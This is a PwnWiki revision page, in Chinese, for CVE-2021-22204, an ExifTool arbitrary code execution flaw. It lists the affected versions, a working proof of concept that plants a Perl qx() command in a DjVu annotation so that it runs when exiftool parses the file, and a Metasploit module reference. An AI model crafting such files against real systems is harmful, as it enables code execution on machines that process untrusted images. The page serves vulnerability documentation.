Difference between revisions of "CVE-2021-22204 ExifTool任意代碼執行漏洞"
From PwnWiki
(Marked this version for translation) |
|||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:1--> |
</translate> | </translate> | ||
ExifTool 7.44 to 12.23 | ExifTool 7.44 to 12.23 | ||
Latest revision as of 20:08, 11 May 2021
影響版本
ExifTool 7.44 to 12.23
POC
$ printf 'P1 1 1 0' > moo.pbm
$ cjb2 moo.pbm moo.djvu
$ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu
$ exiftool moo.djvu > /dev/null
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
--
Jakub Wilk
Metasploit
https://github.com/rapid7/metasploit-framework/pull/15185
exploit/unix/fileformat/exiftool_djvu_ant_perl_injection